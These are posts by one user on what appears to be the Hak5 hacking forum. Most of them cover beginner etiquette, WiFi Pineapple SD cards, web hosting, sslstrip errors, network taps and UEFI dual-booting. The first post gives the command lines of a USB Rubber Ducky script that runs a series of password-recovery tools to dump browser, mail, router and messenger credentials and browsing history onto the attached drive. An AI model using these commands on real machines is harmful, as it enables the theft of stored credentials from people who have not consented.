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Posts posted by mreidiv

  1. do you have a drive labled ducky plugged in with a folder that says MrGraysRubberHacks

    that is what it is asking for here

    STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks

    pluss you need to put the excicutabled on the drive labled DUCKY in the paths shown here

    start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt
    start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt
    start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt
    start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt
    start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt
    start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt
    start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt
    start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt
    start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt
    start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt
    start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt
    start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt
    start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt

    you can download them here


  2. I tend to ramble, so anyone with short attention spans, as usual, meh...lol

    Just looking over some of the posts, I can def hear what some of you are saying and most replies seem to be first time posters. I'm sure we can all relate, and have had that same feeling.

    Everyone has to start somewhere, but not everyone here is an expert on everything, nor is that how it works in the real world either. Beginners learning from beginners though, not that I am against forming some sort of community to learn, but isn;t that what the forums are here for already? And last time I checked, there is not only a Hak5 IRC channel, but thousands of IRC networks not just for beginners(get out of my lobby...er, off my front lawn!!)

    In my experience, you generally learn quicker from people that are not beginners, than you do from a bunch of beginners who want to teach each other. Not trying to discourage anyone, but jump right in to the deep end, don't wade in the kiddy pool expecting to be doing triple back flips off the high dive in a week. This shit takes time. Some are very quick learners(and also have a lot more free time in their mom's basements..did I just stereotype all of us? anyway..) while others, myself included, not always so quick to pick things up.

    It's generally a few who know something and share that with others till everyone knows a little bit more, but no one knows everything there is to know, and hacking (for me anyway) is about learning and tinkering till you figure it out in a way that makes sense for you. If you're new to the forums, and already looking to start your own group for "newbies" then maybe you haven't put in the time to look around, nor are you ready to learn yet. There are some super smart people here, many of whom work in InfoSec and IT for a living, but I think a lot of people expect anything that is asked, whether here or in IRC, to be handed to them on a silver platter and in terms a 3yr old should be able to understand. That may sound harsh, but most of us are self taught or put ourselves through school, work, training, etc, and took whatever answer people gave us, understood or not, and investigated the hell out of it a lot of times before even we fully understood it, and even then - we ourselves may still need help. There will always be the almighty snot of a reply "LMGTFY", better known as - google, for those who aren't familiar with the acronym, "Let me google that for you". That said, we're not all a bunch of dicks(usually), although we can come across that way.(Some of our forum members do have vaginas, but thats off topic..)

    We can all come off as arrogant at times, and thats usually just par for the course in a lot of hacker communities, forums and IRC, but we don't go out of our way to belittle people around here, so before running off to new user land, stick around a bit and participate... You're going to find a diverse group of people from all walks of life and different parts of the world here, so you should expect to hear things you like and don't like - remember, it's just the Internet...there will be trolls out there, bring snacks.

    The forums are full of threads on how/where to get started in many areas of computing, and also some info on basic forum etiquette. For the most part, even when the same questions are asked over and over again we generally answer them or link to threads if we have them handy; sometimes even linking to places that explain in full detail simple questions they could have googled for the first link answering it, searching the forums for you or even making video walkthroughs step by step to share with others if its a hot topic.(In all seriousness, check the forums and even old episodes - it's probably been asked, answered, and even shown how to be done).

    Share and share alike..that may be creative commons motto, but its also the foundation for learning in general. Being here a number of years myself, I still consider myself a noob, but I think everyone, even the smartest of people I've worked with, can be noobs too. There are people that may be able to own a machine in seconds flat, but not know some of the most basic stuff about their own OS, hardware or mobile devices and how to set them up, often things others may find trivial. What one person sees as trivial may be a roadblock for someone else. In other words, one usually doesn't know everything, but you often don't need to either in order to learn, so long as you get the result you want in the end. That's why I think learning from people who know more than you is more beneficial than immediately shouting to the world "Hey noobs, lets all start our own little group for noobs so we can learn together..".

    /we're all noobs here, and learning together... There are countless ways to get from point a to b, sometimes taking 50 steps, or sometimes 1, to get the same result. Learning and hacking, is kind of like that. It's not always going to be a straight line, and its not always going to make sense the first time you see/hear it or do it yourself...

    As for us "arrogant sycophants" (hi Mnemonic, much respect to you for speaking up, even if you have been here for a long time), respect is given in return when its shown, and flames thrown when not. Those who've come in asking things against the basic forum rules do tend to get flamed a bit at times and even myself had been picked on in IRC and the forums when I first joined the Hak5 community(I don;t even recall if I actually asked something noobish, or if someone was just straight up trolling me from day one), but I get into all kinds of flame wars with people here, on twitter, or wherever. Trolling is in itself an art and I think you learn to get thick skinned or throw in the towel early on - so for anyone new, dedication and sticking around is key to learning! Don't get discouraged, because there are always going to be complete snots in every community you join or even start yourself. Not speaking up, will probably not help you to get ahead. That doesn't mean be a total ass about things you want to learn, but don't take offense to every answer, as they aren't always meant to be offensive. Around here, I've found that generally people get flamed because they don't care so much about learning as they do about malicious intent, and you can tell the difference when it happens. IE: how do I hack my school, can I hire someone to hack my old boss, client, my ex-girlfriends computer, revenge requests, etc.

    For me personally, Hacking is all about "learning", regardless of the question and your intention of what you want to do with the answer. I often take what people ask in a thread, and if I don't know myself, look it up so I learn something new, which is how I find out about new things half the time anyway. If something sounds like a foreign language to you, we've all been there, it's normal. Like Cooper just did, he has to look something up that was posted in this thread and I consider him a smart cat to begin with...you can't know everything.

    Someone wants to learn something, ask. That is why the forums are here. It's what you make of it. If someone knows, they'll most likely answer. If they see intent to do harm, they may still answer, but don't be offended if someone locks a thread or even antagonizes you in the process or directly attacks you, even exposes something personal about you in the process. Stick around, we don't bite, unless you ask us to.

    Well said and to the point! :wink:

  3. What i was getting at on my previous post is maybe you should up grade your card. As far as your question I always install everthing to sd. Yes you can create symlinks to move the logs. The pineapple is just linux so it will work like any other linux box with a few exceptions. It is best to install to sd to aleviate issues like logs filling up.

  4. The sd card that shipped with the pineapple was never intended to be used perminatly that card you recieved was so that the pineapple can be flashe with the most recent firmware i would sugest that you go and purchas a fast sd card with the size of memory you want. You will se a big improvement in read write times.

  5. I have ran several sites from home and have found out that is is cheaper and less headaches to go with a paid service. you save on electricity time setting everthing up maintance to the server and security. If you go with a paid service you dont have to set up the server youself you dont have to maintain the server and you dont have to pay the eletric. I'll let other people chime in with their answers but paid worked best for me and it was not that expensive if you shop around. Plus you get alot more bandwidth.

  6. Hey pineappleman, welcome to the forums the main reasion the pine apple was developed in my opinion wat as a drob box that you can just hid somwhere or inside somthing. I makes it easier and less conspicuous when you are trying to do a pentest. Plus with all of the functuniality that you have with the pineapple it pretty much automates parts of the pentest with the flip of a switch.

  7. If you search for Hack Across America coin through the proper social media you should find both sides in decent enough resolution. I'd say 50% of the ***** has been deciphered here. Or one could do cryptoanalysis on the numerous tweets using the OTP and hashtag, but that's just for bonus points.

    So the one that you were handing out at the con is the same one we have been working on here. I thought you were giving out new ones.

  8. Its now working for me at all i get this output from the command line

    File "/usr/bin/sslstrip", line 108, in <module>
    File "/usr/bin/sslstrip", line 101, in main
    reactor.listenTCP(int(listenPort), strippingFactory)
    ValueError: invalid literal for int() with base 10: 'l'

  9. Just want to say I am enjoying the Metasploit Minute series and would love to see this expanded to cover the Kali distro and some of the toolsets like wifi hacking.

    Hey MrHappyDude,

    Check out the kalil forums if you want info on kail there is a section on videos ant tutorials if i remember correctly, also you can find video/tuts on youtube and vimo.

    Welcome to the forum, I just dont think what you are looking for in kali you are going to find here.


  10. I pretty sure that 2 ports connect to the network you are sniffing and the other two are to sniff the traffic both ways so you have to have a second Nic to monitor the traffic going the other way.

    Sniff Incoming


    Network in _________________Network out


    Sniff Outgoing

  11. Windows 8/8.x if pre-installed, most likely has UEFI enabled in the bios, and windows is going to want that enabled to boot windows afterwards, so you'll probably need to find instructions to install Linux under UEFI where Windows 8 already exists. I had to fix a Windows 8 box for someone and repair their MBR, and disabling UEFI, windows 8 wouldn't boot since the system was pre-installed with UEFI enabled. We eventually got it so we could boot off the DVD and changed the boot order, fixed the MBR, but had to keep UEFI on to get Windows 8 to be seen and boot so first thing to check is if UEFI is enabled, and if so, look for linux install instructions under UEFI and how to chainload windows 8 from there I would assume. The whole secure boot process is a bit of a pain but supposed to protect the OS(which in my friends case didn't keep her MBR from getting whacked somehow).

    From what I understand, if Win8 is installed with UEFI first, it won't boot with it disabled later.


    digip has it right i was banging my head on this for a while there are some linux distros with UEFI support out there. I am using mint and it has UEFI but you have to use grub2 because grub to has EUFI support.

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